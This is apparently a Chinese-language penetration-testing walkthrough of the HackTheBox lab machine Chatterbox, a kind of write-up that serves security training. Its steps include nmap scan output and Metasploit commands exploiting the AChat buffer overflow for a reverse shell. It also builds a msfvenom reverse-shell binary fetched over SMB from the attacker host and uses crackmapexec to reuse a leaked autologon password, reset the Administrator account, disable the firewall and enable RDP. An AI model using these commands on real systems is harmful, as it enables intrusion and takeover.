目标信息

IP地址：10.10.10.74

信息收集

ICMP检测

PING 10.10.10.74 (10.10.10.74) 56(84) bytes of data.
64 bytes from 10.10.10.74: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.10.10.74: icmp_seq=2 ttl=127 time=109 ms
64 bytes from 10.10.10.74: icmp_seq=4 ttl=127 time=110 ms

--- 10.10.10.74 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 3331ms
rtt min/avg/max/mdev = 108.901/109.207/109.810/0.425 ms

攻击机和靶机间的网络连接正常。

防火墙检测

# Nmap 7.94SVN scan initiated Wed Oct 16 16:59:42 2024 as: nmap -sF -p- --min-rate 4000 -oN ./fin_result.txt 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.11s latency).
All 65535 scanned ports on 10.10.10.74 are in ignored states.
Not shown: 65535 closed tcp ports (reset)

# Nmap done at Wed Oct 16 17:00:06 2024 -- 1 IP address (1 host up) scanned in 23.97 seconds

无法确定靶机防火墙状态。

网络端口扫描

TCP端口扫描结果

# Nmap 7.94SVN scan initiated Wed Oct 16 17:03:41 2024 as: nmap -sS -sV -A -p- --min-rate 4000 -oN ./tcp_result.txt 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.11s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/16%OT=135%CT=1%CU=37011%PV=Y%DS=2%DC=T%G=Y%TM=67
OS:0F81E8%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S
OS:%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O
OS:5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6
OS:=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%D
OS:F=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%
OS:W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h08m13s, deviation: 2h18m35s, median: 4h48m12s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOXx00
|   Workgroup: WORKGROUPx00
|_  System time: 2024-10-16T09:53:46-04:00
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-10-16T13:53:47
|_  start_date: 2024-10-16T13:26:12

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   107.29 ms 10.10.14.1
2   106.87 ms 10.10.10.74

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 16 17:05:44 2024 -- 1 IP address (1 host up) scanned in 123.28 seconds

UDP端口开放列表扫描结果

# Nmap 7.94SVN scan initiated Wed Oct 16 17:12:03 2024 as: nmap -sU -p- --min-rate 4000 -oN ./udp_ports.txt 10.10.10.74
Warning: 10.10.10.74 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.74
Host is up (0.12s latency).
All 65535 scanned ports on 10.10.10.74 are in ignored states.
Not shown: 65364 open|filtered udp ports (no-response), 171 closed udp ports (port-unreach)

# Nmap done at Wed Oct 16 17:15:08 2024 -- 1 IP address (1 host up) scanned in 185.04 seconds

UDP端口详细信息扫描结果

（无）

同时发现靶机操作系统疑似为Windows 7。

服务探测

AChat服务（9255端口）

尝试使用浏览器访问靶机9255端口，失败，直接联网搜索AChat漏洞：

成功查找到一个远程缓冲区溢出漏洞，编号为CVE-2015-1578。

渗透测试

AChat缓冲区溢出漏洞利用

启动Metasploit，搜索achat，发现一个攻击模块：

直接使用该模块进行攻击，这里需要使用载荷windows/shell/reverse_tcp_allports，否则无法将ShellCode进行编码：

use 0
set payload windows/shell/reverse_tcp_allports
set RHOSTS 10.10.10.74
set LHOST 10.10.14.3
run

接下来直接执行run命令进行攻击：

为了获取稳定的PowerShell反弹，我们需要在本地生成一个反弹PowerShell的程序：

msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f exe -o reverse443.exe

随后在靶机上执行如下命令，通过SMB连接将反弹程序上传到靶机并执行：

net use Z: \\10.10.14.3\pentest_notes\chatterbox ********* /user:megumin
copy Z:\reverse443.exe C:\Users\Public\reverse443.exe
C:\Users\Public\reverse443.exe

反弹PowerShell成功！！！

权限提升

自动登录凭据利用

进入系统后，使用WinPEAS工具对靶机操作系统进行本地信息收集，发现用户Alfred使用了自动登录功能，并且可以发现密码：

尝试将Alfred的密码作为Administrator用户的密码，通过Windows SMB服务进行登录：

crackmapexec smb 10.10.10.74 -u Administrator -p "Welcome1!" -x "whoami /all"

提权成功！！！！接下来直接修改**Administrator**密码、关闭防火墙并打开**RDP**服务：

crackmapexec smb 10.10.10.74 -u Administrator -p "Welcome1!" -x "net user Administrator *********"
crackmapexec smb 10.10.10.74 -u Administrator -p "*********" -x "netsh advfirewall set allprofiles state off"
crackmapexec smb 10.10.10.74 -u Administrator -p "*********" -x "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"

随后使用rdesktop登录即可：

rdesktop 10.10.10.74 -p 3389

HTB靶机 Chatterbox 渗透测试记录